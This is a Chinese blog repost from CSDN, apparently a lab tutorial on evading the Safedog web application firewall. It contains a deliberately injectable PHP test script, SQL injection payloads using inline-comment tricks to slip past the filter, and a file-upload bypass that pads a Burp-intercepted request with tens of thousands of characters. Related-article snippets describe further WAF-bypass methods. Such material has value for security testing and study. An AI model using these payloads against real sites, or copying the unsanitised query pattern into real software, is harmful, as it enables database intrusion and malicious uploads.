mysql 3.23 注入_安全狗SQL注入、上传绕过-2017-3-23

最新推荐文章于 2024-03-13 10:27:32 发布
最新推荐文章于 2024-03-13 10:27:32 发布
阅读量74 收藏
点赞数
文章标签: mysql 3.23 注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_32871457/article/details/113419549
版权

作者是谁不清楚,看到群里分享出来的,所以转载到博客了。-----收集整理 by: www.nvhack.com

d3127af4d742b0a51a7815a49a54dd4c.gif

安全狗SQL注入绕过 测试文件,明显的字符型 SQL 注入 <?php

header("Content-type: text/html; charset=utf-8"); $link = mysql_connect("localhost","root","root"); mysql_select_db("test",$link);

$sql = "select * from cms where id='{$_GET['id']}'"; echo $sql;

echo '
-----------------------------
'; $res = mysql_query($sql);

while ( $rows = mysql_fetch_array($res)) { echo $rows[0];

echo $rows[1]; echo $rows[2];

}

?> 正常运行界面

d3127af4d742b0a51a7815a49a54dd4c.gif 添加注入测试语句 http://localhost/waf123.php?id=3' and 1=1 --+

d3127af4d742b0a51a7815a49a54dd4c.gif 修改测试语句 http://localhost/waf123.php?id=3'/*!and*/%202e1/**/=2e1--+

d3127af4d742b0a51a7815a49a54dd4c.gif

d3127af4d742b0a51a7815a49a54dd4c.gif

d3127af4d742b0a51a7815a49a54dd4c.gif

安全狗上传绕过 附上 php 上传脚本源码,此源码未对上传文件类型做校验

d3127af4d742b0a51a7815a49a54dd4c.gif

d3127af4d742b0a51a7815a49a54dd4c.gif 绕过方法,工具:burpsuite 1,用 php 脚本或者 js,python 等其他语言,生成 48930 个字符 <?php

for ($i=0; $i <= 48930; $i++) { echo 'o';

}

?> 抓包,改包

d3127af4d742b0a51a7815a49a54dd4c.gif 添加后如图

d3127af4d742b0a51a7815a49a54dd4c.gif 查看当前目录,上传成功 1

d3127af4d742b0a51a7815a49a54dd4c.gif

JJ Ying
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
mysql延迟注入br_(原创)安全狗SQL注入绕过思路[sql注入waf绕过][sql注入bypass]
weixin_39743357的博客
01-28 257
2017/09/03_Bypass_safedog_Sql注入prat 1本文大致内容+ 思路以及想法- 四重注释绕过safedog+ 实战绕过- 绕过and 1=1- 绕过union+select- 爆表- 爆字段- 读内容prat 2测试代码$link = mysqli_connect('localhost','root','root','security');$sql = "select *...
安全狗 mysql_绕过安全狗进行sql注入MySQL
weixin_34642354的博客
01-18 531
看我如何一步步绕过安全狗前言前几天渗透了一个站,由于没有做好善后工作被管理员发现了,再次访问那个站的时候,管理员已经删了大马,装上了网站安全狗(我估计大马应该是安全狗删除的,毕竟那个管理员真的太懒了,我的小马还在,并且居然菜刀还可以连接),为了给这个管理员增强点安全防护意识,我就开始研究起了安全狗绕过。 实验环境网站安全狗v4.0apache 2.4.27php 5.6MySQL 5.7 我们需...
mysql注入闭合_Mysql注入绕过安全狗
weixin_33980357的博客
01-19 219
Mysql注入绕过安全狗sql注入闭合检查sql注入的分类有很多种分法;可以分成数字型和字符型,区别在于是否需要完整闭合。本题中由于我经验不足,试了好久才想到就是简单的双引号加括号就可以闭合了,然后再注释掉后面的内容。单引号回显正常结果双引号错误回显这里其实可以简单分析一下,"1 是Get请求传递的参数值,后面的 ")是这里的闭合方式。双引号加括号 ")(" ,就把前后都闭合了。闭合结果接着就简单...
4.0.13 mysql 注入_Bypass安全狗4.0
weixin_29770217的博客
01-26 287
SQL注入Bypass安全狗4.0最近准备多搞搞实战,就准备从绕waf开始,第一位受害者就选安全狗4.0叭。源代码:check$agent = $_SERVER['HTTP_USER_AGENT'];include 'connection.php';function LoginCheck(){if (isset($_GET['username']) && isset($_GET['...
mysql特性绕过安全狗_SQL注入原理及绕过安全狗
weixin_36140403的博客
02-02 282
/...//!.../ 内联注释/*!50000select */(mysql版本大于50000执行)[ ] mysql中一些函数system_user()系统用户名user()用户名current_user()当前用户名session_user()连接数据库的用户名database() 数据库名version()MySql数据库版本load_file()MySql读取本地文件的函数@@datad...
安全狗 mysql_Mysql下Union注入Bypass安全狗过程
weixin_31684041的博客
01-18 134
一次众测发现个注入,然后有安全狗就顺带看了下安全狗。先fuzz看看安全狗拦截什么关键词union select x,x 拦截尝试用union函数 union(select 1,2,3) 拦截union(%20select 1,2,3,4) 不拦截,注意select前面有个空格。之前出题的代码...懒得改了…中二。union(%20select%201,(select%20user%20from%2...
B站小迪安全笔记第十三天-SQL注入MYSQL注入
m0_61530426的博客
07-29 407
B站小迪安全笔记
Mysql本地提权及远程代码执行漏洞浅析(CVE-2016-6662)
9ian1i
10-17 4762
0x00 漏洞影响mysql 5.5、5.6、5.7 在10月份更新前的所有版本,包括分支版本MariaDB和PerconaDB 。0x01 利用途径通过远程数据库连接,web接口如phpMyAdmin,以及sql注入都可以完成。0x02 漏洞原理一些默认的mysql安装方式并且mysqld_safe脚本作为包装器以root权限启动mysql服务进程,比如像:service mysql start
(持续更新中)Web功能测试下的安全测试如何进行?
最新发布
qq_22643187的博客
03-13 1290
想到安全测试很多功能测试人员都很难入手,以为都是专业的安全测试人员去做。比如经常碰到的任务:某某某测试下系统有哪些安全问题,而对于经历过长达五六年的 web 功能、性能、接口测试人员来说,面对该任务就一头雾水。面对任何测试对象,我们需要有对应的范围,然后才讲到各个范围的技术方法。以下安全测试范围是本人实践过的,且用于过部分上市的基金公司安全测试执行过程的测试验证。请看完我的文章描述,我相信可以助力你成为一个初级安全测试工程师!Q:安全测试测试什么啊?Q:安全测试策略如何编写?Q:安全测试如何执行?
Java 知识点整理:Spring、MySQL
m0_67322837的博客
05-06 516
作者:是瑶瑶公主呀 链接:Java 知识点整理:Spring、MySQL_技术交流_牛客网 来源:牛客网 Spring 10 P1:Spring 框架 Spring 是分层的企业级应用轻量级开源框架,以 IoC 和 AOP为内核。Spring 可以降低企业级应用开发的复杂性,对此主要采取了四个关键策略:基于 POJO 的轻量级和最小侵入性编程、通过依赖注入和面向接口实现松耦合、基于切面和惯性进行声明式编程、通过切面和模板减少样板式代码。 好处 降低代码耦合度、简化开发。通过 Spring 提供.
HackproofingMySQL陆小马功钟浩.pdf
09-14
同时,对于Web应用程序而言,如何使用MySQL数据库也是关乎安全的关键,必须确保安全编码实践被应用到每一个细节当中,防止诸如SQL注入等攻击。此外,数据库管理员还需对可能被攻击者利用的MySQL特性保持警惕,及时...
Thinkphp3.2.3及以下版本漏洞整理
热门推荐
hackzkaq的博客
07-01 1万+
更多渗透技能 ,10余本电子书及渗透工具包,搜公众号:白帽子左一 中间件漏洞 一.RCE ThinkPHP3.2.3缓存函数设计缺陷可导致代码执行 概述 网站为了提高访问效率往往会将用户访问过的页面存入缓存来减少开销。 而Thinkphp 在使用缓存的时候是将数据序列化,然后存进一个 php 文件中,这使得命令执行等行为成为可能。 就是缓存函数设计不严格,导致攻击者可以插入恶意代码,直接getshell。 实验环境 redhat6+apache2+Mysql+php5+thinkphp3.2.3 漏洞.
mysql 注入关键字waf_SQL注入中的WAF绕过技术
weixin_29015899的博客
02-18 236
作者:bystander博客:http://leaver.me论坛:法克论坛目录1.大小写绕过2.简单编码绕过3.注释绕过4.分隔重写绕过5.Http参数污染(HPP)6.使用逻辑运算符or /and绕过7.比较操作符替换8.同功能函数替换9.盲注无需or和and10.加括号11.缓冲区溢出绕过1. 大小写绕过这个大家都很熟悉,对于一些太垃圾的WAF效果显著,比如拦截了union,那就使用Uni...
mysql 3.23 注入_MySQL3.23.31之前版本的安全漏洞_mysql
weixin_36343353的博客
01-19 68
所有小于 3.23.31 版本的 mysql 都存在一个缓冲溢出漏洞导致MySQL 崩溃。使攻击者获得 mysqld 权限,而可以操纵所有数据库。攻击的前提是必须有一个合法的登录名和口令。下面为最初发表于 MySQL 邮件列表的信件摘要。http://www.gaodaima.com/38899.htmlMySQL3.23.31之前版本的安全漏洞_mysql====================...
mysql 3.23 注入_MySQL3.23.31之前版本的安全漏洞
weixin_30364109的博客
01-27 91
所有小于 3.23.31 版本的 MySQL 都存在一个缓冲溢出漏洞导致MySQL 崩溃。使攻击者获得 mysqld 权限,而可以操纵所有数据库。攻击的前提是必须有一个合法的登录名和口令。下面为最初发表于 MySQL 邮件列表的信件摘要。==================================================漏洞是由Jo?o Gouveia 于1月12日发现的:步骤:在...
360代码卫士_「经验总结」SQL注入Bypass安全狗360主机卫士
weixin_39880479的博客
11-26 558
0x00 前言这类的文章已经是比较多了,本文也主要是作为学习笔记来记录,主要是记录一下我在学习 SQL 注入 Bypass 的过程,同时前人的不少绕过方法已经失效了,所以这里也是记录一下最新规则的一些绕过方法。0x01 环境搭建测试环境:Win7 + Apache + MySQL 5.7.26 + PHP 5.5.45测试代码:...
mysql注入绕过information_schema过滤
b1ackc4t的博客
10-19 5789
1.利用mysql5.7新增的sys.schema_auto_increment_columns 这是sys数据库下的一个视图,基础数据来自与information_schema,他的作用是对表的自增ID进行监控,也就是说,如果某张表存在自增ID,就可以通过该视图来获取其表名和所在数据库名 以下为该视图的所有列 2.sys.schema_table_statistics_with_buffer 这是sys数据库下的视图,里面存储着所有数据库所有表的统计信息 ...
mysql注入fuzz字典_Fuzz绕过安全狗4.0实现SQL注入
weixin_39880490的博客
01-28 355
0×00 前言本文使用了burp的intruder模块进行fuzz,并修改了sqlmap工具的tamper脚本,对安全狗进行绕过。0×01注入绕waf过常用手法使用大小写绕过使用/**/注释符绕过使用大的数据包绕过使用/!**/注释符绕过……0×02本文使用的手法是/**/注释符首先搭建好一个有sql注入的测试平台,在服务器安装安全狗4.0版本中间件和数据库使用的是apache+mysql+php...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值